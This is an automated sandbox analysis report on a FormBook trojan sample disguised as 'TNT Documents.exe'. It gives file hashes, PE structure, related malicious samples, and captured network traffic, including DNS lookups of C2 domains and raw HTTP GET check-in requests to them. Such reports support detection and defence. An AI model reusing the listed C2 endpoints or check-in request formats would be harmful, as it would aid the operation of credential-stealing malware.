                                                                  cMVyW1SDZz.dllGet hashmaliciousBrowse
                                                                  • 149.56.106.83
                                                                  2iJBYBel22.dllGet hashmaliciousBrowse
                                                                  • 149.56.106.83
                                                                  2iJBYBel22.dllGet hashmaliciousBrowse
                                                                  • 149.56.106.83
                                                                  Tender SN980018277 & SN9901827 Signed Copy.exeGet hashmaliciousBrowse
                                                                  • 51.161.104.181
                                                                  Invoice.exeGet hashmaliciousBrowse
                                                                  • 54.38.220.85
                                                                  AegEywmjUJ.exeGet hashmaliciousBrowse
                                                                  • 51.79.99.124
                                                                  P.O SPECIFICATION.xlsxGet hashmaliciousBrowse
                                                                  • 51.79.99.124
                                                                  DC-330NC.xlsxGet hashmaliciousBrowse
                                                                  • 51.79.99.124
                                                                  FILE_915494026923219.xlsmGet hashmaliciousBrowse
                                                                  • 158.69.222.101
                                                                  UioA2E9DBG.dllGet hashmaliciousBrowse
                                                                  • 158.69.222.101

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TNT Documents.exe.log
                                                                  Process:C:\Users\user\Desktop\TNT Documents.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1314
                                                                  Entropy (8bit):5.350128552078965
                                                                  Encrypted:false
                                                                  SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                  MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                  SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                  SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                  SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                  Malicious:true
                                                                  Reputation:high, very likely benign file
                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):7.5483150102950916
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  File name:TNT Documents.exe
                                                                  File size:503808
                                                                  MD5:f943d9ee79559042bfff9b4e55270cfa
                                                                  SHA1:7dca5c03f55ab6cbebd6bb3a8203d5c1d7516567
                                                                  SHA256:2c26343342361efe4ada7dd077f832792eb77f184ec9a6c5b8c3a8ad35dd5aaa
                                                                  SHA512:c9d6bffff768eb7ff3853eeec196e21286a7d5be040c1b1dc4882cc106fd61d6d33ce24444eb77452fef33310a8d202a7568a4cf6db9c4e9b824b6d54b91cf09
                                                                  SSDEEP:12288:dIzgxqzpbqi/RAu/jlYQpYRKz7OoDxI7pIHL0i:dew2Zqi/B/Jb+IX9I7pIr0
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.9...............P.................. ........@.. ....................... ............@................................

                                                                  File Icon

                                                                  Icon Hash:00828e8e8686b000

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x47c5be
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                  Time Stamp:0xA539E86C [Sat Nov 3 17:54:52 2057 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:v4.0.30319
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x7c56c0x4f.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x7e0000x5ac.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x800000xc.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x7c5500x1c.text
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x20000x7a5c40x7a600False0.809814702503data7.56105630003IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0x7e0000x5ac0x600False0.421223958333data4.10451869633IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0x800000xc0x200False0.044921875data0.0980041756627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountry
                                                                  RT_VERSION0x7e0900x31cdata
                                                                  RT_MANIFEST0x7e3bc0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                  Imports

                                                                  DLLImport
                                                                  mscoree.dll_CorExeMain

                                                                  Version Infos

                                                                  DescriptionData
                                                                  Translation0x0000 0x04b0
                                                                  LegalCopyrightCopyright 2019
                                                                  Assembly Version1.0.0.0
                                                                  InternalNamekvhWV10.exe
                                                                  FileVersion1.0.0.0
                                                                  CompanyName
                                                                  LegalTrademarks
                                                                  Comments
                                                                  ProductNameConnectFour
                                                                  ProductVersion1.0.0.0
                                                                  FileDescriptionConnectFour
                                                                  OriginalFilenamekvhWV10.exe

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  12/02/21-18:59:22.638450TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979480192.168.2.751.255.30.106
                                                                  12/02/21-18:59:22.638450TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979480192.168.2.751.255.30.106
                                                                  12/02/21-18:59:22.638450TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979480192.168.2.751.255.30.106
                                                                  12/02/21-18:59:43.047578TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982080192.168.2.7119.18.54.99
                                                                  12/02/21-18:59:43.047578TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982080192.168.2.7119.18.54.99
                                                                  12/02/21-18:59:43.047578TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982080192.168.2.7119.18.54.99
                                                                  12/02/21-18:59:48.300111TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982280192.168.2.734.102.136.180
                                                                  12/02/21-18:59:48.300111TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982280192.168.2.734.102.136.180
                                                                  12/02/21-18:59:48.300111TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982280192.168.2.734.102.136.180
                                                                  12/02/21-18:59:48.478607TCP1201ATTACK-RESPONSES 403 Forbidden804982234.102.136.180192.168.2.7
                                                                  12/02/21-18:59:59.432108TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982780192.168.2.7158.69.116.156
                                                                  12/02/21-18:59:59.432108TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982780192.168.2.7158.69.116.156
                                                                  12/02/21-18:59:59.432108TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982780192.168.2.7158.69.116.156

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 2, 2021 18:59:22.612127066 CET4979480192.168.2.751.255.30.106
                                                                  Dec 2, 2021 18:59:22.638113976 CET804979451.255.30.106192.168.2.7
                                                                  Dec 2, 2021 18:59:22.638432980 CET4979480192.168.2.751.255.30.106
                                                                  Dec 2, 2021 18:59:22.638449907 CET4979480192.168.2.751.255.30.106
                                                                  Dec 2, 2021 18:59:22.664401054 CET804979451.255.30.106192.168.2.7
                                                                  Dec 2, 2021 18:59:22.687228918 CET804979451.255.30.106192.168.2.7
                                                                  Dec 2, 2021 18:59:22.687256098 CET804979451.255.30.106192.168.2.7
                                                                  Dec 2, 2021 18:59:22.687608004 CET4979480192.168.2.751.255.30.106
                                                                  Dec 2, 2021 18:59:22.687623978 CET4979480192.168.2.751.255.30.106
                                                                  Dec 2, 2021 18:59:22.715280056 CET804979451.255.30.106192.168.2.7
                                                                  Dec 2, 2021 18:59:27.825119019 CET4981580192.168.2.7209.17.116.163
                                                                  Dec 2, 2021 18:59:30.835841894 CET4981580192.168.2.7209.17.116.163
                                                                  Dec 2, 2021 18:59:36.839976072 CET4981580192.168.2.7209.17.116.163
                                                                  Dec 2, 2021 18:59:36.957561016 CET8049815209.17.116.163192.168.2.7
                                                                  Dec 2, 2021 18:59:36.957724094 CET4981580192.168.2.7209.17.116.163
                                                                  Dec 2, 2021 18:59:36.959983110 CET4981580192.168.2.7209.17.116.163
                                                                  Dec 2, 2021 18:59:37.078370094 CET8049815209.17.116.163192.168.2.7
                                                                  Dec 2, 2021 18:59:37.078394890 CET8049815209.17.116.163192.168.2.7
                                                                  Dec 2, 2021 18:59:37.078526974 CET4981580192.168.2.7209.17.116.163
                                                                  Dec 2, 2021 18:59:37.079992056 CET4981580192.168.2.7209.17.116.163
                                                                  Dec 2, 2021 18:59:37.197520971 CET8049815209.17.116.163192.168.2.7
                                                                  Dec 2, 2021 18:59:42.873569965 CET4982080192.168.2.7119.18.54.99
                                                                  Dec 2, 2021 18:59:43.044531107 CET8049820119.18.54.99192.168.2.7
                                                                  Dec 2, 2021 18:59:43.047132015 CET4982080192.168.2.7119.18.54.99
                                                                  Dec 2, 2021 18:59:43.047578096 CET4982080192.168.2.7119.18.54.99
                                                                  Dec 2, 2021 18:59:43.224122047 CET8049820119.18.54.99192.168.2.7
                                                                  Dec 2, 2021 18:59:43.231224060 CET8049820119.18.54.99192.168.2.7
                                                                  Dec 2, 2021 18:59:43.231247902 CET8049820119.18.54.99192.168.2.7
                                                                  Dec 2, 2021 18:59:43.231529951 CET4982080192.168.2.7119.18.54.99
                                                                  Dec 2, 2021 18:59:43.231673956 CET4982080192.168.2.7119.18.54.99
                                                                  Dec 2, 2021 18:59:43.407816887 CET8049820119.18.54.99192.168.2.7
                                                                  Dec 2, 2021 18:59:48.280668020 CET4982280192.168.2.734.102.136.180
                                                                  Dec 2, 2021 18:59:48.299729109 CET804982234.102.136.180192.168.2.7
                                                                  Dec 2, 2021 18:59:48.299890041 CET4982280192.168.2.734.102.136.180
                                                                  Dec 2, 2021 18:59:48.300111055 CET4982280192.168.2.734.102.136.180
                                                                  Dec 2, 2021 18:59:48.319057941 CET804982234.102.136.180192.168.2.7
                                                                  Dec 2, 2021 18:59:48.478606939 CET804982234.102.136.180192.168.2.7
                                                                  Dec 2, 2021 18:59:48.478634119 CET804982234.102.136.180192.168.2.7
                                                                  Dec 2, 2021 18:59:48.478806019 CET4982280192.168.2.734.102.136.180
                                                                  Dec 2, 2021 18:59:48.931884050 CET4982280192.168.2.734.102.136.180
                                                                  Dec 2, 2021 18:59:48.950918913 CET804982234.102.136.180192.168.2.7

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 2, 2021 18:59:22.561023951 CET4995853192.168.2.78.8.8.8
                                                                  Dec 2, 2021 18:59:22.592832088 CET53499588.8.8.8192.168.2.7
                                                                  Dec 2, 2021 18:59:27.700095892 CET5086053192.168.2.78.8.8.8
                                                                  Dec 2, 2021 18:59:27.823506117 CET53508608.8.8.8192.168.2.7
                                                                  Dec 2, 2021 18:59:42.128535032 CET5045253192.168.2.78.8.8.8
                                                                  Dec 2, 2021 18:59:42.871825933 CET53504528.8.8.8192.168.2.7
                                                                  Dec 2, 2021 18:59:48.248903990 CET5931053192.168.2.78.8.8.8
                                                                  Dec 2, 2021 18:59:48.279051065 CET53593108.8.8.8192.168.2.7
                                                                  Dec 2, 2021 18:59:53.948990107 CET5191953192.168.2.78.8.8.8
                                                                  Dec 2, 2021 18:59:53.979896069 CET53519198.8.8.8192.168.2.7
                                                                  Dec 2, 2021 18:59:58.996303082 CET6429653192.168.2.78.8.8.8
                                                                  Dec 2, 2021 18:59:59.324498892 CET53642968.8.8.8192.168.2.7
                                                                  Dec 2, 2021 19:00:09.559422970 CET5668053192.168.2.78.8.8.8
                                                                  Dec 2, 2021 19:00:09.585350990 CET53566808.8.8.8192.168.2.7
                                                                  Dec 2, 2021 19:00:14.876486063 CET5882053192.168.2.78.8.8.8
                                                                  Dec 2, 2021 19:00:14.937154055 CET53588208.8.8.8192.168.2.7
                                                                  Dec 2, 2021 19:00:19.954091072 CET6098353192.168.2.78.8.8.8
                                                                  Dec 2, 2021 19:00:19.995712042 CET53609838.8.8.8192.168.2.7
                                                                  Dec 2, 2021 19:00:25.002089977 CET5228653192.168.2.78.8.8.8
                                                                  Dec 2, 2021 19:00:25.555591106 CET53522868.8.8.8192.168.2.7

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                  Dec 2, 2021 18:59:22.561023951 CET192.168.2.78.8.8.80xb8d4Standard query (0)www.cortepuroiberico.comA (IP address)IN (0x0001)
                                                                  Dec 2, 2021 18:59:27.700095892 CET192.168.2.78.8.8.80x47d2Standard query (0)www.specialtyplastics.onlineA (IP address)IN (0x0001)
                                                                  Dec 2, 2021 18:59:42.128535032 CET192.168.2.78.8.8.80xdbefStandard query (0)www.metronixmedical.comA (IP address)IN (0x0001)
                                                                  Dec 2, 2021 18:59:48.248903990 CET192.168.2.78.8.8.80xbbe2Standard query (0)www.coached.infoA (IP address)IN (0x0001)
                                                                  Dec 2, 2021 18:59:53.948990107 CET192.168.2.78.8.8.80x4020Standard query (0)www.pentagonpublishers.comA (IP address)IN (0x0001)
                                                                  Dec 2, 2021 18:59:58.996303082 CET192.168.2.78.8.8.80xe702Standard query (0)www.projectcentered.comA (IP address)IN (0x0001)
                                                                  Dec 2, 2021 19:00:09.559422970 CET192.168.2.78.8.8.80x47ebStandard query (0)www.functionalsoft.comA (IP address)IN (0x0001)
                                                                  Dec 2, 2021 19:00:14.876486063 CET192.168.2.78.8.8.80xaa06Standard query (0)www.viavelleiloes.onlineA (IP address)IN (0x0001)
                                                                  Dec 2, 2021 19:00:19.954091072 CET192.168.2.78.8.8.80x8197Standard query (0)www.pirosconsulting.comA (IP address)IN (0x0001)
                                                                  Dec 2, 2021 19:00:25.002089977 CET192.168.2.78.8.8.80xe1bbStandard query (0)www.floridanratraining.comA (IP address)IN (0x0001)

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  Dec 2, 2021 18:59:22.592832088 CET8.8.8.8192.168.2.70xb8d4No error (0)www.cortepuroiberico.comcortepuroiberico.comCNAME (Canonical name)IN (0x0001)
                                                                  Dec 2, 2021 18:59:22.592832088 CET8.8.8.8192.168.2.70xb8d4No error (0)cortepuroiberico.com51.255.30.106A (IP address)IN (0x0001)
                                                                  Dec 2, 2021 18:59:27.823506117 CET8.8.8.8192.168.2.70x47d2No error (0)www.specialtyplastics.online209.17.116.163A (IP address)IN (0x0001)
                                                                  Dec 2, 2021 18:59:42.871825933 CET8.8.8.8192.168.2.70xdbefNo error (0)www.metronixmedical.commetronixmedical.comCNAME (Canonical name)IN (0x0001)
                                                                  Dec 2, 2021 18:59:42.871825933 CET8.8.8.8192.168.2.70xdbefNo error (0)metronixmedical.com119.18.54.99A (IP address)IN (0x0001)
                                                                  Dec 2, 2021 18:59:48.279051065 CET8.8.8.8192.168.2.70xbbe2No error (0)www.coached.infocoached.infoCNAME (Canonical name)IN (0x0001)
                                                                  Dec 2, 2021 18:59:48.279051065 CET8.8.8.8192.168.2.70xbbe2No error (0)coached.info34.102.136.180A (IP address)IN (0x0001)
                                                                  Dec 2, 2021 18:59:53.979896069 CET8.8.8.8192.168.2.70x4020Name error (3)www.pentagonpublishers.comnonenoneA (IP address)IN (0x0001)
                                                                  Dec 2, 2021 18:59:59.324498892 CET8.8.8.8192.168.2.70xe702No error (0)www.projectcentered.comprojectcentered.comCNAME (Canonical name)IN (0x0001)
                                                                  Dec 2, 2021 18:59:59.324498892 CET8.8.8.8192.168.2.70xe702No error (0)projectcentered.com158.69.116.156A (IP address)IN (0x0001)
                                                                  Dec 2, 2021 19:00:09.585350990 CET8.8.8.8192.168.2.70x47ebNo error (0)www.functionalsoft.com74.208.236.210A (IP address)IN (0x0001)
                                                                  Dec 2, 2021 19:00:14.937154055 CET8.8.8.8192.168.2.70xaa06Server failure (2)www.viavelleiloes.onlinenonenoneA (IP address)IN (0x0001)
                                                                  Dec 2, 2021 19:00:19.995712042 CET8.8.8.8192.168.2.70x8197Name error (3)www.pirosconsulting.comnonenoneA (IP address)IN (0x0001)
                                                                  Dec 2, 2021 19:00:25.555591106 CET8.8.8.8192.168.2.70xe1bbServer failure (2)www.floridanratraining.comnonenoneA (IP address)IN (0x0001)

                                                                  HTTP Request Dependency Graph

                                                                  • www.cortepuroiberico.com
                                                                  • www.specialtyplastics.online
                                                                  • www.metronixmedical.com
                                                                  • www.coached.info

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.74979451.255.30.10680C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Dec 2, 2021 18:59:22.638449907 CET14538OUTGET /how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRd HTTP/1.1
                                                                  Host: www.cortepuroiberico.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Dec 2, 2021 18:59:22.687228918 CET14538INHTTP/1.1 502 Bad Gateway
                                                                  Server: nginx
                                                                  Date: Thu, 02 Dec 2021 17:59:22 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 150
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  1192.168.2.749815209.17.116.16380C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Dec 2, 2021 18:59:36.959983110 CET14601OUTGET /how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRd HTTP/1.1
                                                                  Host: www.specialtyplastics.online
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Dec 2, 2021 18:59:37.078370094 CET14601INHTTP/1.1 400 Bad Request
                                                                  Server: openresty/1.19.9.1
                                                                  Date: Thu, 02 Dec 2021 17:59:37 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 163
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 39 2e 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.19.9.1</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  2192.168.2.749820119.18.54.9980C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Dec 2, 2021 18:59:43.047578096 CET14603OUTGET /how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&4h=7n_DRJGxnRd HTTP/1.1
                                                                  Host: www.metronixmedical.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Dec 2, 2021 18:59:43.231224060 CET14603INHTTP/1.1 302 Found
                                                                  Date: Thu, 02 Dec 2021 17:59:43 GMT
                                                                  Server: Apache
                                                                  Location: https://metronixmedical.com/how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&4h=7n_DRJGxnRd
                                                                  Content-Length: 320
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 65 74 72 6f 6e 69 78 6d 65 64 69 63 61 6c 2e 63 6f 6d 2f 68 6f 77 36 2f 3f 69 4e 39 74 46 42 3d 65 4f 37 41 4b 35 55 54 53 75 71 54 63 6f 58 41 45 34 4a 4b 50 74 35 74 4f 42 76 36 6e 6e 6d 50 6b 30 4d 32 47 30 49 53 70 49 4f 34 6a 57 77 47 77 48 6c 67 44 77 4d 6e 47 58 42 35 53 66 4b 6f 6c 33 55 65 67 58 43 5a 70 67 3d 3d 26 61 6d 70 3b 34 68 3d 37 6e 5f 44 52 4a 47 78 6e 52 64 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
